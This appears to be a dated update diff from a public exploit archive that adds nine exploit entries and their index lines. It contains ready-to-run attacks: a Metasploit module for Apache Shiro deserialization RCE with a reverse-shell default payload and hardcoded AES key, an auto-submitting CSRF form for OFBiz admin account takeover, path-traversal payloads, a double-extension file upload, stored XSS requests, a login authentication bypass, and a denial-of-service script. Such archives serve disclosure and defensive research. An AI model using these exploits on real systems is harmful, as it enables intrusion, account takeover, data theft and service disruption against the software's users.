DB: 2020-05-02

9 changes to exploits/shellcodes

VirtualTablet Server 3.0.2 - Denial of Service (PoC)

Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)
ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
Online Scheduling System 1.0 - Persistent Cross-Site Scripting
php-fusion 9.03.50 - Persistent Cross-Site Scripting
Super Backup 2.0.5 for iOS - Directory Traversal
HardDrive 2.1 for iOS - Arbitrary File Upload
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
Online Scheduling System 1.0 - Authentication Bypass

exploits/ios/webapps/48405.txt

@@ -0,0 +1,130 @@
+# Title: Super Backup 2.0.5 for iOS - Directory Traversal
+# Author: Vulnerability Laboratory
+# Date: 2020-04-30
+# Software: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
+# CVE: N/A
+
+Document Title:
+===============
+Super Backup v2.0.5 iOS - Directory Traversal Vulnerability
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2200
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+Product & Service Introduction:
+===============================
+Backup all your iPhone or iPad contacts in 1 tap and export them.
+Fastest way to restore contacts from PC or Mac.
+Export by mailing the backed up contacts file to yourself. Export
+contacts file to any other app on your device.
+Export all contacts directly to your PC / Mac over Wifi, no software
+needed! Restore any contacts directly from
+PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
+app now.
+
+(Copy of the Homepage:
+https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )
+
+
+Affected Product(s):
+====================
+Dropouts Technologies LLP
+Product: Super Backup v2.0.5
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-30: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A directory traversal web vulnerability has been discovered in the
+official Super Backup v2.0.5 ios mobile web-application.
+The vulnerability allows remote attackers to change the application path
+in performed requests to compromise the local application
+or file-system of a mobile device. Attackers are for example able to
+request environment variables or a sensitive system path.
+
+The directory-traversal web vulnerability in the app is located in the
+`list` and `download` module with the `path` parameter.
+Attackers are able to change the path variable to request the local list
+command. By changing the path parameter the validation
+mechanism runs into a logic error that turns back the possibility to
+request different pathes outside the basic import/export
+folder. Thus way the attacker injects for example local path environment
+varibales to compromise the local ios web-application.
+
+Exploitation of the directory traversal web vulnerability requires no
+privileged web-application user account or user interaction.
+Successful exploitation of the vulnerability results in information
+leaking by unauthorized file access and mobile application compromise.
+
+
+Proof of Concept (PoC):
+=======================
+The directory traversal vulnerability can be exploited by attackers with
+access to the wifi interface in a local network without user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information and steps below to continue.
+
+
+PoC: Payloads
+%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
+/../../../../../../../../../../../../../../../../../../../../../../%00
+//.././%00
+
+
+PoC: Exploitation
+http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
+http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
+
+
+--- PoC Session Logs [GET]] ---
+http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
+Host: localhost
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+-
+GET: HTTP/1.1 200 OK
+Content-Length: 174
+Content-Type: application/json
+Connection: Close
+-
+http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
+Host: localhost
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+-
+GET: HTTP/1.1 200 OK
+Content-Length: 174
+Content-Type: application/json
+Connection: Close
+-
+Opening the url allows to download the list file json with content path
+output
+[{"path":"../../../../../../../../../../../../ "size":21961}]
+
+
+References:
+http://localhost/list?path=
+http://localhost/download?path=
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/ios/webapps/48406.txt

@@ -0,0 +1,143 @@
+# Title: HardDrive 2.1 for iOS - Arbitrary File Upload
+# Author: Vulnerability Laboratory
+# Date: 2020-04-30
+# Software: https://apps.apple.com/ch/app/harddrive/id383226784
+# CVE: N/A
+
+Document Title:
+===============
+HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2221
+
+
+Common Vulnerability Scoring System:
+====================================
+7.4
+
+
+Product & Service Introduction:
+===============================
+Store+Organize+Edit+Protect+Import+Download+View+Share your files right
+from your iPhone! Transform your
+iPhone/iPod touch into a real HardDrive with no extra cable or software.
+
+(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 )
+
+
+Affected Product(s):
+====================
+Sebastien BUET
+HardDrive v2.1 - Apple iOS Mobile Web Application
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-29: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+An arbitrary file upload web vulnerability has been discovered in the
+official Air Sender v1.0.2 iOS mobile application.
+The web vulnerability allows remote attackers to upload arbitrary files
+to compromise for example the file system of a service.
+
+The arbitrary upload vulnerability is located in the within the
+web-server configuration when using the upload module.
+Remote attackers are able to bypass the local web-server configuration
+by an upload of malicious webshells. Attackers
+are able to inject own files with malicious `filen` values in the
+`upload` POST method request to compromise the
+mobile web-application. The application does not perform checks for
+multiple file extensions. Thus allows an attacker
+to upload for example to upload a html.js.png file. After the upload the
+attacker requests the original url source
+with the uploaded file and removes the unwanted extension to execute the
+code in the unprotected web-frontend.
+
+The security risk of the vulnerability is estimated as high with a
+common vulnerability scoring system count of 7.0.
+Exploitation of the web vulnerability requires a low privilege ftp
+application user account and no user interaction.
+Successful exploitation of the arbitrary file upload web vulnerability
+results in application or device compromise.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] ./upload
+
+Vulnerable File(s):
+[+] file
+
+
+Proof of Concept (PoC):
+=======================
+The arbitrary file upload web vulnerability can be exploited by remote
+attackers without user interaction or privileged user accounts.
+For security demonstration or to reproduce the web vulnerability follow
+the provided information and steps below to continue.
+
+
+PoC: Vulnerable Source (File Dir Listing Index)
+<tr><td width="100px" valign="middle" align="left"><img
+src="exploit.html"></td><td width="300px" valign="middle" align="left">
+<a href="exploit.html.js">exploit.html.js</a></td> <td width="454px"
+valign="middle" align="left">
+<em valign="middle" align="center">size: 256.7 Kb
+
+
+PoC: Exploitation
+http://localhost:50071/exploit.html.js
+
+
+--- PoC Session Logs [POST] --- (file)
+http://localhost:50071/
+Host: localhost:50071
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------9331569428946906291010349387
+Content-Length: 263181
+Origin: http://localhost:50071
+Connection: keep-alive
+Referer: http://localhost:50071/
+file=exploit.html.js.png&button=Submit
+POST: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 381654
+-
+http://localhost:50071/exploit.html.js
+Host: localhost:50071
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: image/webp,*/*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+-
+http://localhost:50071/exploit.html
+GET: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 366735
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/java/webapps/48408.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
+# Exploit Author: Faiz Ahmed Zaidi
+# Vendor Homepage: [https://ofbiz.apache.org/security.html]
+# Software Link: https://ofbiz.apache.org/download.html#security
+# Version: Before 17.12.03
+# Tested on: Linux and Windows
+# CVE : CVE-2019-0235
+
+#Exploit Code:
+
+<html>
+  <body>
+    <form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST">
+      <input type="hidden" name="contactMechId" value="admin" />
+      <input type="hidden" name="contactMechTypeId" value="EMAIL&#95;ADDRESS" />
+      <input type="hidden" name="partyId" value="admin" />
+      <input type="hidden" name="DONE&#95;PAGE" value="viewprofile&#63;party&#95;id&#61;adminâ&#136;&#130;yId&#61;admin" />
+      <input type="hidden" name="emailAddress" value="attackeremail@id.com" />
+      <input type="hidden" name="allowSolicitation" value="Y" />
+      <input type="submit" value="Submit request" />
+    </form>
+	<script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+After that do a password reset via forget password.
+It's done :)

exploits/multiple/remote/48410.rb

@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE',
+      'Description'    => %q{
+        This vulnerability allows remote attackers to execute arbitrary code on vulnerable
+        installations of Apache Shiro v1.2.4.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+            'L / l-codes[at]qq.com'  # Metasploit module
+        ],
+      'References'     =>
+        [
+            ['CVE', '2016-4437'],
+            ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1']
+        ],
+      'Platform'       => %w{ win unix },
+      'Arch'           => [ ARCH_CMD ],
+      'Targets'        =>
+        [
+          [
+            'Unix Command payload',
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix',
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
+          ],
+          [
+            'Windows Command payload',
+            'Arch' => ARCH_CMD,
+            'Platform' => 'win'
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 7 2016',
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+          'WfsDelay'   => 5
+        }
+      )
+    )
+    register_options(
+    [
+      OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
+    ])
+  end
+
+  def aes_encrypt(payload)
+    aes = OpenSSL::Cipher.new('aes-128-cbc')
+    aes.encrypt
+    aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==')
+    aes.random_iv + aes.update(payload) + aes.final
+  end
+
+  def exploit
+    cmd = payload.encoded
+    vprint_status("Execute CMD: #{cmd}")
+    type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' )
+    java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type)
+    ciphertext = aes_encrypt(java_payload)
+    base64_ciphertext = Rex::Text.encode_base64(ciphertext)
+
+    send_request_cgi({
+      'uri'      => target_uri.path,
+      'method'   => 'GET',
+      'cookie'   => "rememberMe=#{base64_ciphertext}"
+    })
+  end
+
+end

exploits/php/webapps/48401.txt

@@ -0,0 +1,55 @@
+# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
+# Exploit Author: Bobby Cooke
+# Date: 2020-04-29
+# Software Link: https://github.com/tmorrell/cheminv
+# Software Info: 
+# "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users."
+# "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University"
+# "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog."
+# Version: 1
+# Tested On: CentOS
+# Vulnerability Type: 
+# ChemInv suffers from a persistent cross-site scripting vulnerability(XSS). This vulnerability can be exploited to have all users of the system, with read access to the project, execute malicious client-side code; every time the users views the 'Projects' or 'Add Chemicals' tab.
+# The application's source code mitigates SQL injection (SQLi), but fails to sanitize HTML and JavaScript injections to the SQL database. 
+
+# Vulnerable Source Code
+## proj_list.php
+ 33                  include('include/include_proj_add.php');
+ 34                         $AddProj = new ProjAdd;
+ 35                         $AddProj->AddProj();
+ 36                         
+ 37                         $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner");
+## include/include_proj_add.php
+  2 class ProjAdd {
+  3     public function AddProj () {
+  4
+  5         require_once('include/login/auth.php');
+  6         include('include/mysql_connect.php');
+  7
+  8         if(isset($_POST['submit'])) {
+  9             $owner          =   $_SESSION['SESS_MEMBER_ID'];
+ 10             $name           =   mysql_real_escape_string($_POST['name']);
+ 11
+ 12             if ($name == '') {
+ 13                 echo '<div class="message red">';
+ 14                 echo 'You have to specify a name!';
+ 15                 echo '</div>';
+ 16             }
+ 17             else {
+ 18                 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')";
+ 19                 $sql_exec = mysql_query($sql);
+
+# Malicious POST Request to https://TARGET/proj_list.php
+  POST /proj_list.php HTTP/1.1
+  Host: TARGET
+  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+  Accept-Language: en-US,en;q=0.5
+  Accept-Encoding: gzip, deflate
+  Referer: https://TARGET/proj_list.php
+  Content-Type: application/x-www-form-urlencoded
+  Content-Length: 16
+  Connection: close
+  Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85
+  
+  name=evilProject<script>alert('XSS');</script>&submit=

exploits/php/webapps/48403.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Online Scheduling System 1.0 - Persistent Cross-Site Scripting
+# Exploit Author: Bobby Cooke
+# Date: 2020-04-30
+# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Vulnerability Info:
+#   Online Scheduling System v1.0 suffers from an authenticated persistent cross-site scripting vulnerability. This Proof of Concept (PoC) will cause all users of the system,  with read access to the courses, to execute arbitrary client-side code when viewing the 'Home' and 'List' tabs within the web application. The application fails to sanitize arguments supplied by the user before inserting them into the SQL database.
+
+# Vulnerable Source Code
+## /add.cor.php
+ 14  $Course_Code = $_POST['corcode'];
+ 15  $Course_name = $_POST['corname'];
+ 16 
+ 17  $sql = "INSERT INTO course (Course_Code, Course_name) VALUES ('$Course_Code', '$Course_name')";
+
+# Malicious POST Request
+  POST /Online%20Scheduling%20System/add.cor.php HTTP/1.1
+  Host: 172.16.65.130
+  Referer: http://172.16.65.130/Online%20Scheduling%20System/addcourse.php
+  Content-Type: application/x-www-form-urlencoded
+  Connection: close
+  Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60
+
+  corcode=XSS-101&corname=%3Cscript%3Ealert%28%22XSS-101%22%29%3B%3C%2Fscript%3E&submit=

exploits/php/webapps/48404.txt

@@ -0,0 +1,102 @@
+# Exploit Title: php-fusion 9.03.50 - Persistent Cross-Site Scripting
+# Google Dork: "php-fusion"
+# Date: 2020-04-30
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://www.php-fusion.co.uk/
+# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30
+# Version: 9.03.50
+# Tested on: Windows
+# CVE : N/A
+
+### Vulnerability : Persistent Cross-Site Scripting
+
+###Describe the bug
+Persistent Cross-site scripting (Stored XSS) vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML
+via the go parameter to /infusions/faq/faq_admin.php, /infusions/shoutbox_panel/shoutbox_admin.php
+
+###To Reproduce
+Steps to reproduce the behavior:
+Authenticated user submit Q&A or Shoutbox to admin
+
+### POC:
+## Submit Q&A:
+
+POST /php-fusion/submit.php?stype=q HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------68756068726681644952075211938
+Content-Length: 1146
+Origin: http://TARGET
+DNT: 1
+Connection: close
+Referer: http://TARGET/php-fusion/submit.php?stype=q
+Cookie: xxx
+Upgrade-Insecure-Requests: 1
+
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="fusion_token"
+
+2-1588232750-f839ed0754d5dc8aa577cfb660e273e711ec03a9a782de90ac34860cdb45a8f1
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="form_id"
+
+submit_form
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="fusion_PR57qY"
+
+
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="faq_question"
+
+Question XSS
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="faq_answer"
+
+xss</textarea><ScRiPt>alert('XSS')</ScRiPt>
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="faq_cat_id"
+
+1
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="faq_language[]"
+
+English
+-----------------------------68756068726681644952075211938
+Content-Disposition: form-data; name="submit_link"
+
+Submit
+-----------------------------68756068726681644952075211938--
+
+## Shoutbox
+
+POST /php-fusion/infusions/downloads/downloads.php?cat_id=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 272
+Origin: http://TARGET
+DNT: 1
+Connection: close
+Referer: http://TARGET/php-fusion/infusions/downloads/downloads.php?cat_id=1
+Cookie: xxx
+Upgrade-Insecure-Requests: 1
+
+fusion_token=2-1588233429-3df5ba2b9c690e833548645f66a7772cf7fdb24ca9be130d5ff01e26351a2771&form_id=sbpanel&fusion_gEHiPs=&shout_id=0
+&shout_hidden=&shout_message=xss</textarea><ScRiPt>alert('XSS')</ScRiPt>&shout_language=English&shout_box=Save+Shout
+
+
+###Reference:
+https://github.com/php-fusion/PHP-Fusion/issues/2306
+
+### History
+=============
+2020-04-09  Issue discovered
+2020-04-14  Vendor contacted
+2020-04-28  Vendor response and hotfix
+2020-04-29  Vendor releases fixed

exploits/php/webapps/48409.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass
+# Exploit Author: Bobby Cooke
+# Date: 2020-04-30
+# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+# Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1
+  POST /Online%20Scheduling%20System/login.php HTTP/1.1
+  Host: TARGET
+  Connection: close
+  Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60
+
+  username=0&password=0&lgn=Login

exploits/windows/dos/48402.py

@@ -0,0 +1,28 @@
+# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC)
+# Author: Dolev Farhi
+# Date: 2020-04-29
+# Vulnerable version: 3.0.2 (14)
+# Link: http://www.sunnysidesoft.com/
+# CVE: N/A
+
+
+from thrift import Thrift
+from thrift.transport import TSocket
+from thrift.transport import TTransport
+from thrift.protocol import TBinaryProtocol
+from pygen.example import Example
+
+host = '192.168.1.1'
+port = 57110
+
+try:
+    transport = TSocket.TSocket(host, port)
+    transport = TTransport.TBufferedTransport(transport)
+    protocol = TBinaryProtocol.TBinaryProtocol(transport)
+    client = Example.Client(protocol)
+    transport.open()
+    client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
+    transport.close()
+
+except Thrift.TException as tx:
+    print(tx.message)

files_exploits.csv

@@ -6729,6 +6729,7 @@ id,file,description,date,author,type,platform,port
 48304,exploits/hardware/dos/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",dos,hardware,
 48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
+48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18134,6 +18135,7 @@ id,file,description,date,author,type,platform,port
 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
 48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
+48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42635,3 +42637,10 @@ id,file,description,date,author,type,platform,port
 48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php,
 48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios,
 48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php,
+48401,exploits/php/webapps/48401.txt,"ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,
+48403,exploits/php/webapps/48403.txt,"Online Scheduling System 1.0 - Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,
+48404,exploits/php/webapps/48404.txt,"php-fusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-01,SunCSR,webapps,php,
+48405,exploits/ios/webapps/48405.txt,"Super Backup 2.0.5 for iOS - Directory Traversal",2020-05-01,Vulnerability-Lab,webapps,ios,
+48406,exploits/ios/webapps/48406.txt,"HardDrive 2.1 for iOS - Arbitrary File Upload",2020-05-01,Vulnerability-Lab,webapps,ios,
+48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,
+48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,